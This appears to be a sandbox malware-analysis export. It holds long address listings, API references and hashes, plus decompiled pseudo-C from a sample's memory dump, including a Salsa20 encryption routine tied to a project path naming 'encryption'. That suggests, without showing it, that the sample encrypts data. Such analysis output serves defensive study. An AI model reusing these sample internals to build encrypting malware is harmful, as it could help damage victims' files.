                                                                                                    0x004103bf
                                                                                                    0x004103bf
                                                                                                    0x004103c4
                                                                                                    0x004103c9
                                                                                                    0x004103e5
                                                                                                    0x004103ec
                                                                                                    0x004103f2
                                                                                                    0x004103f7
                                                                                                    0x004103fc
                                                                                                    0x004103fc
                                                                                                    0x00410401
                                                                                                    0x00410408
                                                                                                    0x0041040f
                                                                                                    0x00410417
                                                                                                    0x00410433
                                                                                                    0x00410436
                                                                                                    0x00410419
                                                                                                    0x0041041c
                                                                                                    0x0041041d
                                                                                                    0x00410427
                                                                                                    0x0041042c
                                                                                                    0x0041042c
                                                                                                    0x0041041d
                                                                                                    0x0041043f
                                                                                                    0x00410445
                                                                                                    0x0041044a
                                                                                                    0x00410451
                                                                                                    0x00410458
                                                                                                    0x00410458
                                                                                                    0x0041045f
                                                                                                    0x00410467
                                                                                                    0x0041046c
                                                                                                    0x0041046c
                                                                                                    0x0041046f
                                                                                                    0x00410471
                                                                                                    0x00410481
                                                                                                    0x00410489
                                                                                                    0x00410490
                                                                                                    0x00410496
                                                                                                    0x0041049c
                                                                                                    0x0041049e
                                                                                                    0x0041049e
                                                                                                    0x004104a1
                                                                                                    0x004104a1
                                                                                                    0x004104a4
                                                                                                    0x004104a7
                                                                                                    0x004104ae
                                                                                                    0x004104b0
                                                                                                    0x004104b0
                                                                                                    0x004104b5
                                                                                                    0x004104d2
                                                                                                    0x004104d9
                                                                                                    0x004104df
                                                                                                    0x004104e4
                                                                                                    0x004104e9
                                                                                                    0x004104e9
                                                                                                    0x004104ee
                                                                                                    0x004104f5
                                                                                                    0x004104fc
                                                                                                    0x00410504
                                                                                                    0x00410520
                                                                                                    0x00410523
                                                                                                    0x00410506
                                                                                                    0x00410509
                                                                                                    0x0041050a
                                                                                                    0x00410514
                                                                                                    0x00410519
                                                                                                    0x00410519
                                                                                                    0x0041050a
                                                                                                    0x0041052c
                                                                                                    0x00410532
                                                                                                    0x00410537
                                                                                                    0x0041053e
                                                                                                    0x00410545
                                                                                                    0x00410545
                                                                                                    0x0041054c
                                                                                                    0x00410558
                                                                                                    0x0041055d
                                                                                                    0x0041055d
                                                                                                    0x00000000
                                                                                                    0x0041054c
                                                                                                    0x00410498
                                                                                                    0x00000000
                                                                                                    0x00410498
                                                                                                    0x00410568
                                                                                                    0x00410728
                                                                                                    0x0041072c
                                                                                                    0x00410731
                                                                                                    0x00410736
                                                                                                    0x00410736
                                                                                                    0x0041073b
                                                                                                    0x00410743
                                                                                                    0x0041074a
                                                                                                    0x00410751
                                                                                                    0x00410755
                                                                                                    0x0041075a
                                                                                                    0x0041075f
                                                                                                    0x0041075f
                                                                                                    0x00410770
                                                                                                    0x00410775
                                                                                                    0x0041077c
                                                                                                    0x0041077e
                                                                                                    0x0041077e
                                                                                                    0x00410792
                                                                                                    0x00410794
                                                                                                    0x0041079c
                                                                                                    0x004107a1
                                                                                                    0x004107a1
                                                                                                    0x004107a6
                                                                                                    0x004107ad
                                                                                                    0x004107af
                                                                                                    0x004107b6
                                                                                                    0x004107c0
                                                                                                    0x004109c7
                                                                                                    0x004109cb
                                                                                                    0x004109d0
                                                                                                    0x004109d5
                                                                                                    0x004109d5
                                                                                                    0x004109d8
                                                                                                    0x004109da
                                                                                                    0x004109e1
                                                                                                    0x004109e8
                                                                                                    0x00000000
                                                                                                    0x004107c6
                                                                                                    0x004107c6
                                                                                                    0x004107d0
                                                                                                    0x004107d0
                                                                                                    0x004107d5
                                                                                                    0x004107e0
                                                                                                    0x004107e0
                                                                                                    0x004107e6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004107eb
                                                                                                    0x00410802
                                                                                                    0x00410802
                                                                                                    0x0041080b
                                                                                                    0x0041080d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410813
                                                                                                    0x00410818
                                                                                                    0x00410820
                                                                                                    0x00410820
                                                                                                    0x00410826
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041082b
                                                                                                    0x00410842
                                                                                                    0x00410842
                                                                                                    0x0041084b
                                                                                                    0x0041084d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041085a
                                                                                                    0x004108bf
                                                                                                    0x004108c6
                                                                                                    0x004108c8
                                                                                                    0x004108ca
                                                                                                    0x004108ca
                                                                                                    0x004108d1
                                                                                                    0x004108d8
                                                                                                    0x004108db
                                                                                                    0x004108e5
                                                                                                    0x004108ed
                                                                                                    0x004108f2
                                                                                                    0x004108fe
                                                                                                    0x00410904
                                                                                                    0x0041090a
                                                                                                    0x0041090a
                                                                                                    0x00410910
                                                                                                    0x00410910
                                                                                                    0x00410913
                                                                                                    0x00410916
                                                                                                    0x0041091d
                                                                                                    0x00000000
                                                                                                    0x00410900
                                                                                                    0x00410900
                                                                                                    0x0041091f
                                                                                                    0x0041091f
                                                                                                    0x0041092a
                                                                                                    0x00410936
                                                                                                    0x0041093b
                                                                                                    0x00410944
                                                                                                    0x0041094e
                                                                                                    0x00410950
                                                                                                    0x00410950
                                                                                                    0x00410952
                                                                                                    0x00410953
                                                                                                    0x00410954
                                                                                                    0x00410959
                                                                                                    0x0041095e
                                                                                                    0x00410963
                                                                                                    0x0041096d
                                                                                                    0x0041096f
                                                                                                    0x0041096f
                                                                                                    0x00410978
                                                                                                    0x00410979
                                                                                                    0x0041097d
                                                                                                    0x0041097e
                                                                                                    0x00410983
                                                                                                    0x00410988
                                                                                                    0x00410990
                                                                                                    0x00410990
                                                                                                    0x00410988
                                                                                                    0x00410995
                                                                                                    0x00410995
                                                                                                    0x0041099d
                                                                                                    0x004109a2
                                                                                                    0x004109a7
                                                                                                    0x004109a7
                                                                                                    0x00000000
                                                                                                    0x0041099d
                                                                                                    0x004108fe
                                                                                                    0x00410869
                                                                                                    0x00410871
                                                                                                    0x0041087b
                                                                                                    0x0041087f
                                                                                                    0x00410884
                                                                                                    0x00410885
                                                                                                    0x0041088a
                                                                                                    0x0041088c
                                                                                                    0x0041088e
                                                                                                    0x00410895
                                                                                                    0x0041089d
                                                                                                    0x004108a4
                                                                                                    0x004108b2
                                                                                                    0x004108b7
                                                                                                    0x00000000
                                                                                                    0x004108b7
                                                                                                    0x0041082d
                                                                                                    0x00410831
                                                                                                    0x00410835
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410837
                                                                                                    0x0041083a
                                                                                                    0x00410840
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410840
                                                                                                    0x00410846
                                                                                                    0x00410848
                                                                                                    0x00000000
                                                                                                    0x00410848
                                                                                                    0x004107ed
                                                                                                    0x004107f1
                                                                                                    0x004107f5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004107f7
                                                                                                    0x004107fa
                                                                                                    0x00410800
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410800
                                                                                                    0x00410806
                                                                                                    0x00410808
                                                                                                    0x00000000
                                                                                                    0x004109aa
                                                                                                    0x004109b8
                                                                                                    0x004109c1
                                                                                                    0x00000000
                                                                                                    0x004109c1
                                                                                                    0x004107c0
                                                                                                    0x0041056e
                                                                                                    0x00410573
                                                                                                    0x00410575
                                                                                                    0x00410577
                                                                                                    0x0041057e
                                                                                                    0x00410586
                                                                                                    0x0041058d
                                                                                                    0x00410592
                                                                                                    0x00410597
                                                                                                    0x0041059c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004105a2
                                                                                                    0x004105ad
                                                                                                    0x004105ba
                                                                                                    0x004105bf
                                                                                                    0x004105c3
                                                                                                    0x004105c5
                                                                                                    0x004105c8
                                                                                                    0x004105cd
                                                                                                    0x004105eb
                                                                                                    0x004105eb
                                                                                                    0x004105f0
                                                                                                    0x004105f5
                                                                                                    0x004105ff
                                                                                                    0x00410601
                                                                                                    0x00410601
                                                                                                    0x00410605
                                                                                                    0x0041060b
                                                                                                    0x00410610
                                                                                                    0x00410620
                                                                                                    0x00410628
                                                                                                    0x0041062f
                                                                                                    0x00410638
                                                                                                    0x0041063d
                                                                                                    0x00410642
                                                                                                    0x00410642
                                                                                                    0x00410645
                                                                                                    0x0041064a
                                                                                                    0x00410651
                                                                                                    0x00410658
                                                                                                    0x0041065f
                                                                                                    0x00410688
                                                                                                    0x00410661
                                                                                                    0x00410664
                                                                                                    0x00410665
                                                                                                    0x00410675
                                                                                                    0x0041067a
                                                                                                    0x0041067d
                                                                                                    0x0041067d
                                                                                                    0x00410665
                                                                                                    0x00410691
                                                                                                    0x00410697
                                                                                                    0x0041069c
                                                                                                    0x004106a7
                                                                                                    0x004106ae
                                                                                                    0x004106b3
                                                                                                    0x004106b9
                                                                                                    0x004106c0
                                                                                                    0x004106c2
                                                                                                    0x004106c4
                                                                                                    0x004106c4
                                                                                                    0x004106c8
                                                                                                    0x004106d5
                                                                                                    0x004106db
                                                                                                    0x004106dd
                                                                                                    0x004106dd
                                                                                                    0x004106e1
                                                                                                    0x004106e7
                                                                                                    0x004106ec
                                                                                                    0x004106ee
                                                                                                    0x004106f0
                                                                                                    0x004106f7
                                                                                                    0x004106ff
                                                                                                    0x00410706
                                                                                                    0x0041070d
                                                                                                    0x00410713
                                                                                                    0x00410718
                                                                                                    0x00410718
                                                                                                    0x0041071d
                                                                                                    0x00410720
                                                                                                    0x00410725
                                                                                                    0x00410725
                                                                                                    0x00000000
                                                                                                    0x0041071d
                                                                                                    0x004105d0
                                                                                                    0x004105d7
                                                                                                    0x004105df
                                                                                                    0x004105e3
                                                                                                    0x004105e4
                                                                                                    0x004105e7
                                                                                                    0x00000000
                                                                                                    0x004105d0
                                                                                                    0x00410363
                                                                                                    0x00000000
                                                                                                    0x004101bc
                                                                                                    0x004101bc
                                                                                                    0x004101c0
                                                                                                    0x004101c2
                                                                                                    0x004101c9
                                                                                                    0x004101cc
                                                                                                    0x004101d6
                                                                                                    0x004101de
                                                                                                    0x004101eb
                                                                                                    0x004101ef
                                                                                                    0x004101f6
                                                                                                    0x004101fe
                                                                                                    0x00410205
                                                                                                    0x0041020c
                                                                                                    0x00410211
                                                                                                    0x00410215
                                                                                                    0x0041021b
                                                                                                    0x004102a3
                                                                                                    0x004102a7
                                                                                                    0x004102ac
                                                                                                    0x004102b1
                                                                                                    0x004102b1
                                                                                                    0x004102b6
                                                                                                    0x004102bd
                                                                                                    0x004102c4
                                                                                                    0x004102cb
                                                                                                    0x004102cf
                                                                                                    0x004102d4
                                                                                                    0x004102d9
                                                                                                    0x004102d9
                                                                                                    0x00000000
                                                                                                    0x004102cf
                                                                                                    0x00410221
                                                                                                    0x00410227
                                                                                                    0x00000000
                                                                                                    0x00410229
                                                                                                    0x00410230
                                                                                                    0x0041023a
                                                                                                    0x0041023c
                                                                                                    0x00410246
                                                                                                    0x0041024b
                                                                                                    0x0041024b
                                                                                                    0x00410254
                                                                                                    0x0041025a
                                                                                                    0x00410263
                                                                                                    0x00410265
                                                                                                    0x0041026f
                                                                                                    0x00410277
                                                                                                    0x00410277
                                                                                                    0x00410283
                                                                                                    0x0041028b
                                                                                                    0x00410290
                                                                                                    0x00410295
                                                                                                    0x0041029a
                                                                                                    0x0041036b
                                                                                                    0x00410370
                                                                                                    0x00410375
                                                                                                    0x00410375
                                                                                                    0x00410378
                                                                                                    0x0041037a
                                                                                                    0x00410385
                                                                                                    0x0041038c
                                                                                                    0x00410390
                                                                                                    0x00410399
                                                                                                    0x0041039e
                                                                                                    0x0041039e
                                                                                                    0x004109ec
                                                                                                    0x004109f0
                                                                                                    0x004109f5
                                                                                                    0x004109fa
                                                                                                    0x00410a02
                                                                                                    0x00410a0d
                                                                                                    0x004102a0
                                                                                                    0x004102a0
                                                                                                    0x00000000
                                                                                                    0x004102a0
                                                                                                    0x0041029a
                                                                                                    0x004102dc
                                                                                                    0x004102dc
                                                                                                    0x004102dd
                                                                                                    0x004102e0
                                                                                                    0x00000000
                                                                                                    0x004101c0

                                                                                                    APIs
                                                                                                      • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
                                                                                                      • Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
                                                                                                      • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE
                                                                                                    • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                                                                                                    • _memmove.LIBCMT ref: 00410427
                                                                                                    • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                                                                                                    • _memmove.LIBCMT ref: 00410514
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                    • String ID:
                                                                                                    • API String ID: 273148273-0
                                                                                                    • Opcode ID: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                                                                                    • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                                                                                                    • Opcode Fuzzy Hash: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                                                                                    • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004382A2(short _a4, intOrPtr _a8) {
                                                                                                    				short _t13;
                                                                                                    				short _t28;
                                                                                                    
                                                                                                    				_t28 = _a4;
                                                                                                    				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
                                                                                                    					if(E00437413(_t28, ?str?) != 0) {
                                                                                                    						return E00423C92(_t28);
                                                                                                    					}
                                                                                                    					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
                                                                                                    						L9:
                                                                                                    						return 0;
                                                                                                    					}
                                                                                                    					return _a4;
                                                                                                    				}
                                                                                                    				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
                                                                                                    					goto L9;
                                                                                                    				}
                                                                                                    				_t13 = _a4;
                                                                                                    				if(_t13 == 0) {
                                                                                                    					return GetACP();
                                                                                                    				}
                                                                                                    				return _t13;
                                                                                                    			}





                                                                                                    0x004382a6
                                                                                                    0x004382ab
                                                                                                    0x004382d3
                                                                                                    0x00000000
                                                                                                    0x004382fc
                                                                                                    0x004382ee
                                                                                                    0x0043831a
                                                                                                    0x00000000
                                                                                                    0x0043831a
                                                                                                    0x00000000
                                                                                                    0x004382f0
                                                                                                    0x00438318
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0043831e
                                                                                                    0x00438323
                                                                                                    0x00438327
                                                                                                    0x00438327
                                                                                                    0x004382f5

                                                                                                    APIs
                                                                                                    • _wcscmp.LIBCMT ref: 004382B9
                                                                                                    • _wcscmp.LIBCMT ref: 004382CA
                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale_wcscmp
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 1351282208-711371036
                                                                                                    • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                    • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                                    • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                    • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 55%
                                                                                                    			E0040C070(intOrPtr __ecx, void* __edx, void* __esi, signed int* _a4, signed char* _a8, intOrPtr _a12) {
                                                                                                    				signed int _v8;
                                                                                                    				signed int _v12;
                                                                                                    				signed int _v16;
                                                                                                    				signed int _v20;
                                                                                                    				signed int _v24;
                                                                                                    				signed int _v28;
                                                                                                    				signed int _v32;
                                                                                                    				signed int _v36;
                                                                                                    				signed int _v40;
                                                                                                    				signed int _v44;
                                                                                                    				signed int _v48;
                                                                                                    				signed int _v52;
                                                                                                    				intOrPtr _v56;
                                                                                                    				char _v60;
                                                                                                    				signed int _v64;
                                                                                                    				signed int _v68;
                                                                                                    				signed int _v72;
                                                                                                    				signed int _v76;
                                                                                                    				signed int _v80;
                                                                                                    				signed int _v84;
                                                                                                    				signed int _v88;
                                                                                                    				signed int _v92;
                                                                                                    				signed int _v96;
                                                                                                    				signed int _v100;
                                                                                                    				signed int _v104;
                                                                                                    				signed int _v108;
                                                                                                    				signed int _v112;
                                                                                                    				signed int _v116;
                                                                                                    				signed int _v120;
                                                                                                    				signed int _v124;
                                                                                                    				intOrPtr _v128;
                                                                                                    				char _v190;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				intOrPtr _t174;
                                                                                                    				signed int _t186;
                                                                                                    				signed int _t217;
                                                                                                    				signed int _t219;
                                                                                                    				signed int _t225;
                                                                                                    				signed int _t229;
                                                                                                    				signed int _t235;
                                                                                                    				signed int _t237;
                                                                                                    				void* _t244;
                                                                                                    				intOrPtr _t248;
                                                                                                    				signed char _t250;
                                                                                                    				signed int _t252;
                                                                                                    				signed int _t254;
                                                                                                    				signed int _t255;
                                                                                                    				signed int _t256;
                                                                                                    				signed int _t258;
                                                                                                    				signed int _t260;
                                                                                                    				signed int _t262;
                                                                                                    				signed int _t264;
                                                                                                    				signed int _t266;
                                                                                                    				signed int _t268;
                                                                                                    				signed int _t269;
                                                                                                    				signed int _t270;
                                                                                                    				signed int* _t272;
                                                                                                    				signed int _t276;
                                                                                                    				signed int _t277;
                                                                                                    				intOrPtr _t284;
                                                                                                    				void* _t285;
                                                                                                    				void* _t286;
                                                                                                    				signed int _t288;
                                                                                                    				signed int _t289;
                                                                                                    				unsigned int _t290;
                                                                                                    				intOrPtr _t292;
                                                                                                    				signed char* _t293;
                                                                                                    				signed int _t294;
                                                                                                    				signed int _t295;
                                                                                                    				signed char* _t296;
                                                                                                    				void* _t297;
                                                                                                    				signed int _t298;
                                                                                                    				signed int _t299;
                                                                                                    				char* _t301;
                                                                                                    				void* _t303;
                                                                                                    				void* _t305;
                                                                                                    				void* _t313;
                                                                                                    
                                                                                                    				_t297 = __esi;
                                                                                                    				_t286 = __edx;
                                                                                                    				_t251 = _a4;
                                                                                                    				_t174 = __ecx;
                                                                                                    				_v56 = __ecx;
                                                                                                    				_t293 = _a8;
                                                                                                    				if(_a4 == 0) {
                                                                                                    					L2:
                                                                                                    					_push(0x7a);
                                                                                                    					E004211DD(_t251, _t286, _t293, _t297, _t309, L"input != nullptr && output != nullptr", L"e:\\doc\\my work (c++)\\_git\\encryption\\encryptionwinapi\\Salsa20.inl");
                                                                                                    					_t174 = _v56;
                                                                                                    				} else {
                                                                                                    					_t309 = _t293;
                                                                                                    					if(_t293 == 0) {
                                                                                                    						goto L2;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				if(_a12 != 0) {
                                                                                                    					_v128 = _t174 -  &_v190;
                                                                                                    					_push(_t297);
                                                                                                    					do {
                                                                                                    						asm("movdqu xmm0, [eax]");
                                                                                                    						_v60 = 0xa;
                                                                                                    						asm("movdqu [ebp-0x78], xmm0");
                                                                                                    						asm("movdqu xmm0, [eax+0x10]");
                                                                                                    						asm("movdqu [ebp-0x68], xmm0");
                                                                                                    						asm("movdqu xmm0, [eax+0x20]");
                                                                                                    						asm("movdqu [ebp-0x58], xmm0");
                                                                                                    						_t294 = _v80;
                                                                                                    						asm("movdqu xmm0, [eax+0x30]");
                                                                                                    						_v8 = _v84;
                                                                                                    						_v36 = _v88;
                                                                                                    						_v16 = _v92;
                                                                                                    						_v48 = _v96;
                                                                                                    						_v44 = _v100;
                                                                                                    						_v32 = _v104;
                                                                                                    						_v12 = _v108;
                                                                                                    						_v40 = _v112;
                                                                                                    						asm("movdqu [ebp-0x48], xmm0");
                                                                                                    						_t252 = _v76;
                                                                                                    						_t276 = _v64;
                                                                                                    						_t288 = _v68;
                                                                                                    						_t298 = _v72;
                                                                                                    						_v28 = _v116;
                                                                                                    						_v24 = _v120;
                                                                                                    						_t186 = _v124;
                                                                                                    						_v52 = _t252;
                                                                                                    						_v20 = _t186;
                                                                                                    						do {
                                                                                                    							asm("rol eax, 0x7");
                                                                                                    							_v12 = _v12 ^ _t186 + _t252;
                                                                                                    							asm("rol eax, 0x9");
                                                                                                    							_v16 = _v16 ^ _v12 + _v20;
                                                                                                    							asm("rol eax, 0xd");
                                                                                                    							_t254 = _v52 ^ _v16 + _v12;
                                                                                                    							_v52 = _t254;
                                                                                                    							asm("ror eax, 0xe");
                                                                                                    							_v20 = _v20 ^ _v16 + _t254;
                                                                                                    							asm("rol eax, 0x7");
                                                                                                    							_v36 = _v36 ^ _v24 + _v32;
                                                                                                    							asm("rol eax, 0x9");
                                                                                                    							_t299 = _t298 ^ _v36 + _v32;
                                                                                                    							_t255 = _v44;
                                                                                                    							asm("rol eax, 0xd");
                                                                                                    							_v24 = _v24 ^ _v36 + _t299;
                                                                                                    							asm("ror eax, 0xe");
                                                                                                    							_v32 = _v32 ^ _v24 + _t299;
                                                                                                    							asm("rol eax, 0x7");
                                                                                                    							_t289 = _t288 ^ _v8 + _t255;
                                                                                                    							asm("rol eax, 0x9");
                                                                                                    							_v28 = _v28 ^ _v8 + _t289;
                                                                                                    							asm("rol eax, 0xd");
                                                                                                    							_t256 = _t255 ^ _v28 + _t289;
                                                                                                    							_v44 = _t256;
                                                                                                    							asm("ror eax, 0xe");
                                                                                                    							_v8 = _v8 ^ _v28 + _t256;
                                                                                                    							asm("rol eax, 0x7");
                                                                                                    							_t258 = _v40 ^ _t294 + _t276;
                                                                                                    							_v40 = _t258;
                                                                                                    							asm("rol eax, 0x9");
                                                                                                    							_t260 = _v48 ^ _t258 + _t276;
                                                                                                    							_v48 = _t260;
                                                                                                    							asm("rol eax, 0xd");
                                                                                                    							_t295 = _t294 ^ _v40 + _t260;
                                                                                                    							asm("ror eax, 0xe");
                                                                                                    							_t277 = _t276 ^ _t260 + _t295;
                                                                                                    							asm("rol eax, 0x7");
                                                                                                    							_v24 = _v24 ^ _v20 + _v40;
                                                                                                    							_t217 = _v24;
                                                                                                    							_v120 = _t217;
                                                                                                    							asm("rol eax, 0x9");
                                                                                                    							_v28 = _v28 ^ _t217 + _v20;
                                                                                                    							_t219 = _v28;
                                                                                                    							_v116 = _t219;
                                                                                                    							asm("rol eax, 0xd");
                                                                                                    							_t262 = _v40 ^ _t219 + _v24;
                                                                                                    							_v40 = _t262;
                                                                                                    							asm("ror eax, 0xe");
                                                                                                    							_v112 = _t262;
                                                                                                    							_t264 = _v20 ^ _v28 + _t262;
                                                                                                    							asm("rol eax, 0x7");
                                                                                                    							_v44 = _v44 ^ _v32 + _v12;
                                                                                                    							_t225 = _v44;
                                                                                                    							_v100 = _t225;
                                                                                                    							asm("rol eax, 0x9");
                                                                                                    							_v20 = _t264;
                                                                                                    							_v124 = _t264;
                                                                                                    							_t266 = _v48 ^ _t225 + _v32;
                                                                                                    							_v48 = _t266;
                                                                                                    							asm("rol eax, 0xd");
                                                                                                    							_v12 = _v12 ^ _v44 + _t266;
                                                                                                    							_t229 = _v12;
                                                                                                    							_v108 = _t229;
                                                                                                    							asm("ror eax, 0xe");
                                                                                                    							_v96 = _t266;
                                                                                                    							_t268 = _v32 ^ _t229 + _t266;
                                                                                                    							_v32 = _t268;
                                                                                                    							_v104 = _t268;
                                                                                                    							_t269 = _v36;
                                                                                                    							asm("rol eax, 0x7");
                                                                                                    							_t294 = _t295 ^ _v8 + _t269;
                                                                                                    							asm("rol eax, 0x9");
                                                                                                    							_v16 = _v16 ^ _v8 + _t294;
                                                                                                    							_t235 = _v16;
                                                                                                    							_v92 = _t235;
                                                                                                    							asm("rol eax, 0xd");
                                                                                                    							_t270 = _t269 ^ _t235 + _t294;
                                                                                                    							_t237 = _t270;
                                                                                                    							_v36 = _t270;
                                                                                                    							_v88 = _t237;
                                                                                                    							asm("ror eax, 0xe");
                                                                                                    							_v8 = _v8 ^ _t237 + _v16;
                                                                                                    							_v84 = _v8;
                                                                                                    							asm("rol eax, 0x7");
                                                                                                    							_t252 = _v52 ^ _t277 + _t289;
                                                                                                    							_v52 = _t252;
                                                                                                    							_v76 = _t252;
                                                                                                    							asm("rol eax, 0x9");
                                                                                                    							_t298 = _t299 ^ _t277 + _t252;
                                                                                                    							asm("rol eax, 0xd");
                                                                                                    							_t288 = _t289 ^ _t298 + _t252;
                                                                                                    							asm("ror eax, 0xe");
                                                                                                    							_t276 = _t277 ^ _t288 + _t298;
                                                                                                    							_t138 =  &_v60;
                                                                                                    							 *_t138 = _v60 - 1;
                                                                                                    							_t186 = _v20;
                                                                                                    						} while ( *_t138 != 0);
                                                                                                    						_t272 = _a4;
                                                                                                    						_t244 = 0;
                                                                                                    						_v80 = _t294;
                                                                                                    						_t296 = _a8;
                                                                                                    						_v64 = _t276;
                                                                                                    						_v68 = _t288;
                                                                                                    						_v72 = _t298;
                                                                                                    						do {
                                                                                                    							_t301 =  &_v190 + _t244;
                                                                                                    							 *(_t305 + _t244 - 0x78) =  *(_t305 + _t244 - 0x78) +  *((intOrPtr*)(_t301 + _v128));
                                                                                                    							_t290 =  *(_t305 + _t244 - 0x78);
                                                                                                    							 *((char*)(_t301 - 1)) = _t290 >> 8;
                                                                                                    							 *(_t305 + _t244 - 0xbc) = _t290;
                                                                                                    							_t244 = _t244 + 4;
                                                                                                    							 *_t301 = _t290 >> 0x10;
                                                                                                    							 *((char*)(_t301 + 1)) = _t290 >> 0x18;
                                                                                                    							_t313 = _t244 - 0x40;
                                                                                                    						} while (_t313 < 0);
                                                                                                    						_t284 = _v56;
                                                                                                    						_t292 = _a12;
                                                                                                    						 *((intOrPtr*)(_t284 + 0x20)) =  *((intOrPtr*)(_t284 + 0x20)) + 1;
                                                                                                    						 *((intOrPtr*)(_t284 + 0x24)) =  *((intOrPtr*)(_t284 + 0x24)) + (0 | _t313 == 0x00000000);
                                                                                                    						_t303 =  >=  ? 0x40 : _t292;
                                                                                                    						_t285 = 0;
                                                                                                    						if(_t303 == 0) {
                                                                                                    							goto L12;
                                                                                                    						} else {
                                                                                                    							goto L10;
                                                                                                    						}
                                                                                                    						do {
                                                                                                    							L10:
                                                                                                    							_t292 = _t292 - 1;
                                                                                                    							_t250 =  *(_t305 + _t285 - 0xbc) ^  *_t272;
                                                                                                    							_t285 = _t285 + 1;
                                                                                                    							 *_t296 = _t250;
                                                                                                    							_t272 =  &(_t272[0]);
                                                                                                    							_t296 =  &(_t296[1]);
                                                                                                    						} while (_t285 < _t303);
                                                                                                    						_a12 = _t292;
                                                                                                    						_a4 = _t272;
                                                                                                    						_a8 = _t296;
                                                                                                    						L12:
                                                                                                    						_t248 = _v56;
                                                                                                    					} while (_t292 != 0);
                                                                                                    					return _t248;
                                                                                                    				}
                                                                                                    				return _t174;
                                                                                                    			}

















































































                                                                                                    0x0040c070
                                                                                                    0x0040c070
                                                                                                    0x0040c07a
                                                                                                    0x0040c07d
                                                                                                    0x0040c07f
                                                                                                    0x0040c083
                                                                                                    0x0040c088
                                                                                                    0x0040c08e
                                                                                                    0x0040c08e
                                                                                                    0x0040c09a
                                                                                                    0x0040c09f
                                                                                                    0x0040c08a
                                                                                                    0x0040c08a
                                                                                                    0x0040c08c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040c08c
                                                                                                    0x0040c0a9
                                                                                                    0x0040c0b9
                                                                                                    0x0040c0bc
                                                                                                    0x0040c0c0
                                                                                                    0x0040c0c0
                                                                                                    0x0040c0c4
                                                                                                    0x0040c0cb
                                                                                                    0x0040c0d0
                                                                                                    0x0040c0d5
                                                                                                    0x0040c0da
                                                                                                    0x0040c0df
                                                                                                    0x0040c0e4
                                                                                                    0x0040c0e7
                                                                                                    0x0040c0ef
                                                                                                    0x0040c0f5
                                                                                                    0x0040c0fb
                                                                                                    0x0040c101
                                                                                                    0x0040c107
                                                                                                    0x0040c10d
                                                                                                    0x0040c113
                                                                                                    0x0040c119
                                                                                                    0x0040c11f
                                                                                                    0x0040c124
                                                                                                    0x0040c127
                                                                                                    0x0040c12a
                                                                                                    0x0040c12d
                                                                                                    0x0040c130
                                                                                                    0x0040c136
                                                                                                    0x0040c139
